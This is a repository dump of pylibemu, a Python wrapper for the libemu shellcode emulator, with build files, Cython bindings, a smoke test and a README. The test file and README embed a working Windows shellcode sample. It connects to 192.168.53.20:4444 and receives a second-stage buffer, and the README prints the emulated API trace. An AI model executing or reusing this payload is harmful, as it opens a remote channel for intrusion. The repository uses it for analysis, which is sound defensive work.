├── setup.cfg ├── MANIFEST ├── MANIFEST.in ├── .travis.yml ├── .gitignore ├── setup.py ├── tests ├── cpu_mem_test.py └── sctest.py ├── README.rst ├── src ├── pylibemu.pxd └── pylibemu.pyx └── LICENSE.txt /setup.cfg: -------------------------------------------------------------------------------- 1 | [metadata] 2 | description_file = README.md 3 | -------------------------------------------------------------------------------- /MANIFEST: -------------------------------------------------------------------------------- 1 | # file GENERATED by distutils, do NOT edit 2 | LICENSE.txt 3 | setup.cfg 4 | setup.py 5 | src/pylibemu.c 6 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include LICENSE.txt 2 | include run_pykg_config.py 3 | recursive-include docs *.html *.css *.png *.gif 4 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | dist: jammy 2 | sudo: required 3 | language: python 4 | python: 5 | - "pypy" 6 | - "pypy3" 7 | - "3.7" 8 | - "3.8" 9 | - "3.9" 10 | - "3.10" 11 | before_install: 12 | - git clone https://github.com/buffer/libemu.git 13 | - cd libemu 14 | - autoreconf -v -i 15 | - ./configure 16 | - sudo make install 17 | - cd - 18 | install: 19 | - sudo python setup.py install 20 | script: 21 | - echo "Build done" 22 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Copying and distribution of this file, with or without modification, 2 | # are permitted in any medium without royalty provided this notice is 3 | # preserved. This file is offered as-is, without any warranty. 
4 | # Names of contributors must not be used to endorse or promote products 5 | # derived from this file without specific prior written permission. 6 | 7 | # Generated files 8 | *.pyc 9 | 10 | # Generated directories 11 | build 12 | release 13 | dist 14 | 15 | # IDE 16 | .project 17 | .pydevproject 18 | 19 | # Archives 20 | *.zip 21 | *.tar.* 22 | *.tgz 23 | *.gz 24 | *.bz2 25 | *.xz 26 | *.lz 27 | *.lzma 28 | *.7z 29 | *.dll 30 | *.deb 31 | *.rpm 32 | *.apk 33 | *.exe 34 | *.msi 35 | *.dmg 36 | *.ipa 37 | 38 | # OS specific useless files 39 | thumbs.db 40 | Thumbs.db 41 | __MACOSX/ 42 | __MAC_OS_X/ 43 | __OSX/ 44 | __OS_X/ 45 | __WINDOWS/ 46 | __MS_WINDOWS/ 47 | .DS_Store 48 | .directory 49 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup 2 | from setuptools.extension import Extension 3 | from setuptools.command.build_clib import build_clib 4 | 5 | try: 6 | from Cython.Distutils import build_ext 7 | has_cython = True 8 | except ImportError: 9 | has_cython = False 10 | 11 | 12 | # sourcefiles = ['src/pylibemu.pyx'] 13 | # cmdclass = { 'build_ext' : build_ext, 'build_clib' : build_clib } 14 | sourcefiles = ['src/pylibemu.c'] 15 | cmdclass = {'build_clib' : build_clib} 16 | 17 | 18 | setup( 19 | name = "pylibemu", 20 | packages = [], 21 | version = "1.0", 22 | description = "Libemu Python wrapper", 23 | url = "https://github.com/buffer/pylibemu", 24 | author = "Angelo Dell'Aera", 25 | author_email = "angelo.dellaera@honeynet.org", 26 | maintainer = "Angelo Dell'Aera", 27 | maintainer_email = "angelo.dellaera@honeynet.org", 28 | classifiers = [ 29 | "Programming Language :: Cython", 30 | "Development Status :: 4 - Beta", 31 | "Environment :: Console", 32 | "Intended Audience :: Developers", 33 | "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", 34 | "Operating System :: Unix", 35 | "Topic :: 
Software Development :: Libraries :: Python Modules", 36 | "Topic :: Security", 37 | ], 38 | cmdclass = cmdclass, 39 | keywords = ['libemu', 'pylibemu', 'shellcode'], 40 | ext_modules = [Extension("pylibemu", 41 | sources = sourcefiles, 42 | libraries = ["emu"] 43 | )], 44 | ) 45 | -------------------------------------------------------------------------------- /tests/cpu_mem_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # cpu_mem_test.py 4 | # 5 | # Copyright(c) 2011-2022 Angelo Dell'Aera 6 | # 7 | # This program is free software; you can redistribute it and/or modify 8 | # it under the terms of the GNU General Public License version 2 as 9 | # published by the Free Software Foundation. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA

import logging

import pylibemu

# Smoke test for the pylibemu.Emulator wrapper: dump the CPU registers left
# behind by the GetPC heuristic, then (further down in this script) exercise
# the memory read/write helpers.  Everything is reported through the
# "pylibemu" logger at WARNING level so it shows up without any logging setup.
log = logging.getLogger("pylibemu")

# Register names indexed by libemu's enum values (eax == 0 ... edi == 7).
# The same index is accepted by cpu_reg32_get / cpu_reg16_get / cpu_reg8_get.
regs32 = ('eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi')
regs16 = ('ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di')
regs8 = ('al', 'cl', 'dl', 'bl', 'ah', 'ch', 'dh', 'bh')

# Sample x86 shellcode (the same bytes as the usage example in README.rst).
# It is only ever handed to the emulator, never executed natively.
shellcode = (
    b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d"
    b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34"
    b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0"
    b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9"
    b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c"
    b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
    b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32"
    b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53"
    b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02"
    b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6"
    b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3"
    b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50"
    b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6"
)

emulator = pylibemu.Emulator()
# GetPC heuristic: reports the offset at which the shellcode appears to start
# and leaves the emulated CPU state behind for the register dump below.
offset = emulator.shellcode_getpc_test(shellcode)

# Dump eax..esi (indexes 0-6) in their 32-, 16- and 8-bit views.
# NOTE(review): the bound stops one short of edi (index 7), which therefore is
# never dumped -- probably an off-by-one.  It is kept as-is, and the loop
# variable keeps its name, because the statements that follow this loop reuse
# `i` with its final value (6).
for i in range(7):
    log.warning("%s => %s", regs32[i], hex(emulator.cpu_reg32_get(i)))
    log.warning("%s => %s", regs16[i], hex(emulator.cpu_reg16_get(i)))
    log.warning("%s => %s", regs8[i], hex(emulator.cpu_reg8_get(i)))
74 |   # NOTE(review): the `assert`s below are this script's only pass/fail signal; they are stripped under `python -O`
75 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))  # disassembly text of the instruction at the current eip, logged between each memory check
76 | 
77 | emulator.memory_write_dword(emulator.cpu_reg32_get(i), 0x41424344)  # `i` is whatever the register loop above left behind (its last index), so the target address is that register's current value
78 | 
79 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
80 | 
81 | dword = emulator.memory_read_dword(emulator.cpu_reg32_get(i))  # read back at the same address through the dword, word and byte accessors
82 | assert dword == 0x41424344  # the full value round-trips ...
83 | 
84 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
85 | 
86 | word = emulator.memory_read_word(emulator.cpu_reg32_get(i))
87 | assert word == 0x4344  # ... and the low word / low byte sit at the lowest address, i.e. the emulated memory is little-endian
88 | 
89 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
90 | 
91 | byte = emulator.memory_read_byte(emulator.cpu_reg32_get(i))
92 | assert byte == 0x44
93 | 
94 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
95 | 
96 | emulator.memory_segment_select(5)  # 5 is s_gs in libemu's enum emu_segment (cs=0 ... gs=5, see src/pylibemu.pxd)
97 | assert emulator.memory_segment_get() == 5
98 | 
99 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
100 | 
101 | eip = emulator.cpu_eip_get()  # from here on the reads target the instruction pointer instead of the register chosen above; values are only logged, not asserted
102 | log.warning(hex(eip))
103 | 
104 | dword = emulator.memory_read_dword(eip)
105 | log.warning(hex(dword))
106 | 
107 | word = emulator.memory_read_word(eip)
108 | log.warning(hex(word))
109 | 
110 | byte = emulator.memory_read_byte(eip)
111 | log.warning(hex(byte))
112 | 
113 | block = emulator.memory_read_block(eip, 4)
114 | #log.warning('0x' + ''.join(["%02x" % ord(x) for x in block[::-1]]))  # left disabled: presumably `block` is bytes under Python 3 (as memory_read_string's result is, see the .decode below), in which case iterating yields ints and ord() would raise TypeError
115 | 
116 | log.warning(emulator.cpu_get_current_instruction().decode('utf-8'))
117 | 
118 | emulator.memory_write_dword(emulator.cpu_reg32_get(i), 0x00414243)  # stored little-endian as 43 42 41 00, i.e. "CBA" followed by a NUL terminator
119 | s = emulator.memory_read_string(emulator.cpu_reg32_get(i), 4)  # maxsize 4 covers exactly those bytes; the result is bytes and is decoded below
120 | log.warning(s.decode('utf-8'))
121 | 
122 | log.warning(emulator.env_w32_hook_check())  # result of the win32 hook check is just logged, not asserted on
123 | -------------------------------------------------------------------------------- /README.rst: -------------------------------------------------------------------------------- 1 | 2 | Pylibemu |version badge| |downloads badge| 3 | 
============================================================================ 4 | 5 | .. |version badge| image:: https://img.shields.io/pypi/v/pylibemu.svg 6 | :target: https://pypi.python.org/pypi/pylibemu/ 7 | .. |downloads badge| image:: https://img.shields.io/pypi/dm/pylibemu.svg 8 | :target: https://pypi.python.org/pypi/pylibemu/ 9 | 10 | Pylibemu is a wrapper for the Libemu library (https://github.com/buffer/libemu). 11 | 12 | 13 | Requirements 14 | ============ 15 | 16 | - Python 2.5+ or Python 3.6+ (read installation notes) 17 | - Libemu 18 | 19 | 20 | Installation (Python 3) 21 | ======================= 22 | 23 | Pylibemu > 0.5.8 no longer bundles Libemu as a git submodule, so Libemu must be 24 | installed before Pylibemu. 25 | 26 | To install Libemu, just execute: 27 | 28 | .. code-block:: console 29 | 30 | $ git clone https://github.com/buffer/libemu.git 31 | $ cd libemu 32 | $ autoreconf -v -i 33 | $ ./configure 34 | $ make 35 | $ sudo make install 36 | The clone above builds whatever Libemu's default branch contains at that moment; check out a known tag or commit hash after cloning if you need a reproducible build of the native library. 37 | Once Libemu is correctly installed, just execute: 38 | 39 | .. code-block:: console 40 | 41 | $ sudo pip install pylibemu 42 | Running ``pip`` with ``sudo`` installs into the system interpreter; installing into a virtual environment (where no ``sudo`` is needed) is preferable. 43 | 44 | Installation (Python 2) 45 | ======================= 46 | 47 | Pylibemu 0.5.8 is the last version supporting Python 2. 48 | 49 | To install Pylibemu, just execute: 50 | 51 | .. code-block:: console 52 | 53 | $ sudo pip install pylibemu==0.5.8 54 | 55 | 56 | Usage 57 | ===== 58 | 59 | .. 
code-block:: pycon 60 | 61 | >>> import pylibemu 62 | >>> shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" 63 | >>> shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" 64 | >>> shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" 65 | >>> shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" 66 | >>> shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" 67 | >>> shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" 68 | >>> shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" 69 | >>> shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" 70 | >>> shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" 71 | >>> shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" 72 | >>> shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" 73 | >>> shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" 74 | >>> shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" 75 | >>> emulator = pylibemu.Emulator() 76 | >>> offset = emulator.shellcode_getpc_test(shellcode) 77 | >>> offset 78 | 4 79 | >>> emulator.prepare(shellcode, offset) 80 | >>> emulator.test() 81 | 0 82 | >>> print emulator.emu_profile_output 83 | HMODULE LoadLibraryA ( 84 | LPCTSTR lpFileName = 0x0012fe90 => 85 | = "ws2_32"; 86 | ) = 0x71a10000; 87 | int WSAStartup ( 88 | WORD wVersionRequested = 2; 89 | LPWSADATA lpWSAData = 1244272; 90 | ) = 0; 91 | SOCKET WSASocket ( 92 | int af = 2; 93 | int type = 1; 94 | int protocol = 0; 95 | LPWSAPROTOCOL_INFO lpProtocolInfo = 0; 96 | GROUP g = 0; 97 | DWORD dwFlags = 0; 98 | ) = 66; 99 | int connect ( 100 | SOCKET s = 66; 101 | struct sockaddr_in * name = 0x0012fe88 => 102 | struct = { 103 | short sin_family = 2; 104 | unsigned short sin_port = 23569 (port=4444); 105 | struct in_addr sin_addr = { 106 | unsigned long s_addr = 339060928 
(host=192.168.53.20); 107 | }; 108 | char sin_zero = " "; 109 | }; 110 | int namelen = 16; 111 | ) = 0; 112 | int recv ( 113 | SOCKET s = 66; 114 | char * buf = 0x0012fe88 => 115 | none; 116 | int len = 3072; 117 | int flags = 0; 118 | ) = 3072; 119 | 120 | >>> emulator.emu_profile_truncated 121 | False 122 | 123 | 124 | The Emulator method ``run``, introduced in Pylibemu 0.1.3, takes care of the steps shown above 125 | (GetPC test, ``prepare``, ``test``) in a single call, and the Emulator attribute ``offset`` exposes 126 | the detected offset if it is needed. 127 | 128 | .. code-block:: pycon 129 | 130 | >>> emulator = pylibemu.Emulator() 131 | >>> emulator.run(shellcode) 132 | 0 133 | >>> emulator.offset 134 | 4 135 | >>> print emulator.emu_profile_output 136 | HMODULE LoadLibraryA ( 137 | LPCTSTR = 0x01a3f990 => 138 | = "ws2_32"; 139 | ) = 1906376704; 140 | int WSAStartup ( 141 | WORD wVersionRequested = 2; 142 | LPWSADATA lpWSAData = 1244272; 143 | ) = 0; 144 | SOCKET WSASocket ( 145 | int af = 2; 146 | int type = 1; 147 | int protocol = 0; 148 | LPWSAPROTOCOL_INFO lpProtocolInfo = 0; 149 | GROUP g = 0; 150 | DWORD dwFlags = 0; 151 | ) = 66; 152 | int connect ( 153 | SOCKET s = 66; 154 | struct sockaddr_in * name = 0x0012fe88 => 155 | struct = { 156 | short sin_family = 2; 157 | unsigned short sin_port = 23569 (port=4444); 158 | struct in_addr sin_addr = { 159 | unsigned long s_addr = 339060928 (host=192.168.53.20); 160 | }; 161 | char sin_zero = " "; 162 | }; 163 | int namelen = 16; 164 | ) = 0; 165 | int recv ( 166 | SOCKET s = 66; 167 | char * = 0x01a40870 => 168 | none; 169 | int len = 3072; 170 | int flags = 0; 171 | ) = 3072; 172 | 173 | >>> emulator.emu_profile_truncated 174 | False 175 | 176 | 177 | The Emulator accepts the optional parameter ``output_size`` which defines how much memory 178 | will be reserved for storing the emulation profile dump. By default, its size is 1MB but 179 | it can be changed in two ways: 180 | 181 | .. 
code-block:: pycon 182 | 183 | >>> emulator = pylibemu.Emulator(1024) 184 | 185 | >>> emulator = pylibemu.Emulator() 186 | >>> emulator.set_output_size(1024) 187 | 188 | If the reserved memory is not large enough to hold the entire dump, the dump is truncated 189 | and the Emulator attribute ``emu_profile_truncated`` is set to True. The limit exists so that 190 | performance is not penalized by shellcodes that produce dumps of several MB (such as the 191 | Metasploit windows/download_exec payload). A truncated dump omits whatever did not fit, so 192 | check ``emu_profile_truncated`` before treating a profile as complete; if the entire dump is 193 | needed, increase the reserved memory through the Emulator ``set_output_size`` method and 194 | run the shellcode emulation test again as shown above. 195 | Note also that the underlying ``emu_shellcode_test`` declares its size parameter as ``uint16_t`` (see ``src/pylibemu.pxd``), so a single test can only describe a buffer of up to 65535 bytes; check how the wrapper bounds longer inputs before relying on it. 196 | 197 | License information 198 | =================== 199 | 200 | Copyright (C) 2011-2023 Angelo Dell'Aera 201 | 202 | License: GNU General Public License, version 2 203 | -------------------------------------------------------------------------------- /src/pylibemu.pxd: -------------------------------------------------------------------------------- 1 | # pylibemu.pxd 2 | # 3 | # Copyright(c) 2011-2022 Angelo Dell'Aera 4 | # 5 | # This program is free software; you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License version 2 as 7 | # published by the Free Software Foundation. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 
13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program; if not, write to the Free Software 16 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, 17 | # MA 02111-1307 USA 18 | 19 | #cython: language_level=3 20 | 21 | from libc.stdint cimport int16_t, int32_t, uint8_t, uint16_t, uint32_t 22 | cimport cpython 23 | 24 | 25 | cdef extern from *: 26 | ctypedef char* const_char_ptr "const char*" 27 | 28 | 29 | cdef extern from "stdarg.h": 30 | ctypedef struct va_list: 31 | pass 32 | 33 | ctypedef struct fake_type: 34 | pass 35 | 36 | void va_start(va_list, void *arg) 37 | void* va_arg(va_list, fake_type) 38 | void va_end(va_list) 39 | 40 | fake_type void_ptr_type "void *" 41 | fake_type char_ptr_type "char *" 42 | fake_type int_type "int" 43 | 44 | 45 | cdef extern from "stdio.h": 46 | int snprintf(char *, size_t, char *, ...) 47 | 48 | 49 | cdef extern from "stdlib.h": 50 | void free(void* ) 51 | void *malloc(size_t) 52 | 53 | 54 | cdef extern from "string.h": 55 | char *strncat(char *, char *, size_t) 56 | void *memset(void *, int , size_t) 57 | 58 | 59 | cdef extern from "netinet/in.h": 60 | ctypedef struct c_in_addr "struct in_addr": 61 | pass 62 | 63 | 64 | cdef extern from "arpa/inet.h": 65 | uint16_t ntohs(uint16_t) 66 | char *inet_ntoa(c_in_addr) 67 | 68 | 69 | cdef extern from "emu/emu_string.h": 70 | ctypedef struct c_emu_string "struct emu_string": 71 | uint32_t size 72 | void *data 73 | uint32_t allocated 74 | 75 | 76 | cdef extern from "emu/emu_memory.h": 77 | ctypedef struct c_emu_memory "struct emu_memory": 78 | pass 79 | 80 | ctypedef enum c_emu_segment "enum emu_segment": 81 | s_cs = 0 82 | s_ss = 1 83 | s_ds = 2 84 | s_es = 3 85 | s_fs = 4 86 | s_gs = 5 87 | 88 | int32_t emu_memory_write_byte(c_emu_memory *m, uint32_t addr, uint8_t byte) 89 | int32_t emu_memory_write_word(c_emu_memory *m, uint32_t addr, uint16_t word) 90 | int32_t emu_memory_write_dword(c_emu_memory *m, uint32_t addr, 
uint32_t dword) 91 | int32_t emu_memory_write_block(c_emu_memory *m, uint32_t addr, void *src, size_t _len) 92 | 93 | int32_t emu_memory_read_byte(c_emu_memory *m, uint32_t addr, uint8_t *byte) 94 | int32_t emu_memory_read_word(c_emu_memory *m, uint32_t addr, uint16_t *word) 95 | int32_t emu_memory_read_dword(c_emu_memory *m, uint32_t addr, uint32_t *dword) 96 | int32_t emu_memory_read_block(c_emu_memory *m, uint32_t addr, void *dest, size_t _len) 97 | int32_t emu_memory_read_string(c_emu_memory *m, uint32_t addr, c_emu_string *s, uint32_t maxsize) 98 | 99 | void emu_memory_segment_select(c_emu_memory *m, c_emu_segment s) 100 | c_emu_segment emu_memory_segment_get(c_emu_memory *m) 101 | 102 | 103 | cdef extern from "emu/environment/emu_profile.h": 104 | cdef enum emu_profile_argument_render: 105 | render_none 106 | render_ptr 107 | render_int 108 | render_short 109 | render_struct 110 | render_string 111 | render_bytea 112 | render_ip 113 | render_port 114 | render_array 115 | 116 | ctypedef enum c_emu_profile_argument_render "enum emu_profile_argument_render": 117 | pass 118 | 119 | ctypedef struct c_emu_profile_argument "struct emu_profile_argument" 120 | 121 | ctypedef struct c_emu_profile_argument_root "struct emu_profile_argument_root": 122 | pass 123 | 124 | ctypedef struct c_bytea: 125 | unsigned char *data 126 | uint32_t size 127 | 128 | ctypedef struct c_tstruct: 129 | c_emu_profile_argument_root *arguments 130 | 131 | ctypedef struct c_tptr: 132 | c_emu_profile_argument *ptr 133 | uint32_t addr 134 | 135 | ctypedef union c_emu_profile_argument_value: 136 | int32_t tint 137 | int16_t tshort 138 | char *tchar 139 | c_bytea bytea 140 | c_tstruct tstruct 141 | c_tptr tptr 142 | 143 | ctypedef struct c_emu_profile_argument "struct emu_profile_argument": 144 | emu_profile_argument_render render 145 | c_emu_profile_argument_value value 146 | char *argname 147 | char *argtype 148 | 149 | ctypedef struct c_emu_profile_function "struct emu_profile_function": 150 | 
emu_profile_argument_render retval 151 | char *fnname 152 | c_emu_profile_argument_root *arguments 153 | c_emu_profile_argument *return_value 154 | 155 | ctypedef struct c_emu_profile_function_root "struct emu_profile_function_root": 156 | pass 157 | 158 | ctypedef struct c_emu_profile_function "struct emu_profile_function": 159 | pass 160 | 161 | ctypedef struct c_emu_profile "struct emu_profile": 162 | c_emu_profile_function_root *functions 163 | 164 | c_emu_profile *emu_profile_new() 165 | void emu_profile_free(c_emu_profile *profile) 166 | void emu_profile_debug(c_emu_profile *profile) 167 | c_emu_profile_argument *emu_profile_arguments_first(c_emu_profile_argument_root *root) 168 | c_emu_profile_argument *emu_profile_arguments_next(c_emu_profile_argument *argument) 169 | bint emu_profile_arguments_istail(c_emu_profile_argument *argument) 170 | void emu_profile_argument_debug(c_emu_profile_argument *argument, int indent) 171 | c_emu_profile_function *emu_profile_functions_first(c_emu_profile_function_root *root) 172 | c_emu_profile_function *emu_profile_functions_next(c_emu_profile_function *function) 173 | bint emu_profile_functions_istail(c_emu_profile_function *function) 174 | void emu_profile_function_debug(c_emu_profile_function *function) 175 | 176 | 177 | cdef extern from "emu/emu.h": 178 | ctypedef struct c_emu "struct emu": 179 | pass 180 | 181 | 182 | cdef extern from "emu/emu_cpu_data.h": 183 | ctypedef struct c_emu_instruction "struct emu_instruction": 184 | pass 185 | 186 | ctypedef struct c_emu_cpu_instruction_info "struct emu_cpu_instruction_info": 187 | pass 188 | 189 | ctypedef struct c_emu_track_and_source "struct emu_track_and_source": 190 | pass 191 | 192 | ctypedef struct c_emu_cpu "struct emu_cpu": 193 | c_emu *emu 194 | c_emu_memory *mem 195 | uint32_t debugflags 196 | uint32_t eip 197 | uint32_t eflags 198 | uint32_t reg[8] 199 | uint16_t *reg16[8] 200 | uint8_t *reg8[8] 201 | c_emu_instruction instr 202 | c_emu_cpu_instruction_info 
*cpu_instr_info 203 | uint32_t last_fpu_instr[2] 204 | char *instr_string 205 | bint repeat_current_instr 206 | c_emu_track_and_source *tracking 207 | 208 | 209 | cdef extern from "emu/emu.h": 210 | ctypedef struct c_emu_logging "struct emu_logging": 211 | pass 212 | 213 | ctypedef struct c_emu_fpu "struct emu_fpu": 214 | pass 215 | 216 | c_emu *emu_new() 217 | void emu_free(c_emu *e) 218 | c_emu_memory *emu_memory_get(c_emu *e) 219 | c_emu_logging *emu_logging_get(c_emu *e) 220 | c_emu_cpu *emu_cpu_get(c_emu *e) 221 | int emu_errno(c_emu *c) 222 | char *emu_strerror(c_emu *e) 223 | 224 | 225 | cdef extern from "emu/emu_cpu.h": 226 | ctypedef enum c_emu_reg32 "enum emu_reg32": 227 | eax = 0 228 | ecx = 1 229 | edx = 2 230 | ebx = 3 231 | esp = 4 232 | ebp = 5 233 | esi = 6 234 | edi = 7 235 | 236 | ctypedef enum c_emu_reg16 "enum emu_reg16": 237 | ax = 0 238 | cx = 1 239 | dx = 2 240 | bx = 3 241 | sp = 4 242 | bp = 5 243 | si = 6 244 | di = 7 245 | 246 | ctypedef enum c_emu_reg8 "enum emu_reg8": 247 | al = 0 248 | cl = 1 249 | dl = 2 250 | bl = 3 251 | ah = 4 252 | ch = 5 253 | dh = 6 254 | bh = 7 255 | 256 | uint32_t emu_cpu_reg32_get(c_emu_cpu *cpu_p, c_emu_reg32 reg) 257 | void emu_cpu_reg32_set(c_emu_cpu *cpu_p, c_emu_reg32 reg, uint32_t val) 258 | uint16_t emu_cpu_reg16_get(c_emu_cpu *cpu_p, c_emu_reg16 reg) 259 | void emu_cpu_reg16_set(c_emu_cpu *cpu_p, c_emu_reg16 reg, uint16_t val) 260 | uint8_t emu_cpu_reg8_get(c_emu_cpu *cpu_p, c_emu_reg8 reg) 261 | void emu_cpu_reg8_set(c_emu_cpu *cpu_p, c_emu_reg8 reg, uint8_t val) 262 | uint32_t emu_cpu_eflags_get(c_emu_cpu *c) 263 | void emu_cpu_eflags_set(c_emu_cpu *c, uint32_t val) 264 | void emu_cpu_eip_set(c_emu_cpu *c, uint32_t eip) 265 | uint32_t emu_cpu_eip_get(c_emu_cpu *c) 266 | int32_t emu_cpu_parse(c_emu_cpu *c) 267 | int32_t emu_cpu_step(c_emu_cpu *c) 268 | int32_t emu_cpu_run(c_emu_cpu *c) 269 | void emu_cpu_free(c_emu_cpu *c) 270 | void emu_cpu_debug_print(c_emu_cpu *c) 271 | void 
emu_cpu_debugflag_set(c_emu_cpu *c, uint8_t flag) 272 | void emu_cpu_debugflag_unset(c_emu_cpu *c, uint8_t flag) 273 | 274 | 275 | cdef extern from "emu/environment/linux/emu_env_linux.h": 276 | ctypedef struct c_emu_env_linux "struct emu_env_linux": 277 | pass 278 | 279 | ctypedef struct c_emu_env_linux_syscall "struct emu_env_linux_syscall": 280 | pass 281 | 282 | 283 | cdef extern from "emu/environment/win32/emu_env_w32.h": 284 | ctypedef struct c_emu_env_w32 "struct emu_env_w32": 285 | pass 286 | 287 | 288 | cdef extern from "emu/environment/win32/emu_env_w32_dll_export.h": 289 | ctypedef struct c_emu_env_w32_dll_export "struct emu_env_w32_dll_export": 290 | char *fnname 291 | uint32_t virtualaddr 292 | void *userdata 293 | 294 | 295 | cdef extern from "emu/environment/emu_env.h": 296 | ctypedef struct c_env: 297 | c_emu_env_w32 *win 298 | c_emu_env_linux *lin 299 | 300 | ctypedef struct c_emu_env "struct emu_env": 301 | c_env env 302 | c_emu *emu 303 | c_emu_profile *profile 304 | void *userdata 305 | 306 | ctypedef enum c_emu_env_type "enum emu_env_type": 307 | emu_env_type_win32, 308 | emu_env_type_linux 309 | 310 | ctypedef union c_hook: 311 | c_emu_env_w32_dll_export *win 312 | c_emu_env_linux_syscall *lin 313 | 314 | ctypedef struct c_emu_env_hook "struct emu_env_hook": 315 | c_emu_env_type type 316 | c_hook hook 317 | 318 | c_emu_env *emu_env_new(c_emu *e) 319 | void emu_env_free(c_emu_env *env) 320 | 321 | 322 | cdef extern from "emu/environment/linux/emu_env_linux.h": 323 | c_emu_env_hook *emu_env_linux_syscall_check(c_emu_env *env) 324 | 325 | 326 | cdef extern from "emu/environment/win32/emu_env_w32.h": 327 | int32_t emu_env_w32_load_dll(c_emu_env_w32 *env, char *path) 328 | c_emu_env_hook *emu_env_w32_eip_check(c_emu_env *env) 329 | int32_t emu_env_w32_export_hook(c_emu_env *env, 330 | char *exportname, 331 | uint32_t (*fnhook)(c_emu_env *env, c_emu_env_hook *hook, ...), 332 | void *userdata) 333 | 334 | 335 | cdef extern from "emu/emu_shellcode.h": 
336 | int32_t emu_shellcode_test(c_emu *e, uint8_t *data, uint16_t size) 337 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | GNU GENERAL PUBLIC LICENSE 3 | Version 2, June 1991 4 | 5 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 6 | 59 Temple Place, Suite 330, Boston, MA 02111 USA 7 | Everyone is permitted to copy and distribute verbatim copies 8 | of this license document, but changing it is not allowed. 9 | 10 | Preamble 11 | 12 | The licenses for most software are designed to take away your 13 | freedom to share and change it. By contrast, the GNU General Public 14 | License is intended to guarantee your freedom to share and change free 15 | software--to make sure the software is free for all its users. This 16 | General Public License applies to most of the Free Software 17 | Foundation's software and to any other program whose authors commit to 18 | using it. (Some other Free Software Foundation software is covered by 19 | the GNU Library General Public License instead.) You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | this service if you wish), that you receive source code or can get it 26 | if you want it, that you can change the software or use pieces of it 27 | in new free programs; and that you know you can do these things. 28 | 29 | To protect your rights, we need to make restrictions that forbid 30 | anyone to deny you these rights or to ask you to surrender the rights. 31 | These restrictions translate to certain responsibilities for you if you 32 | distribute copies of the software, or if you modify it. 
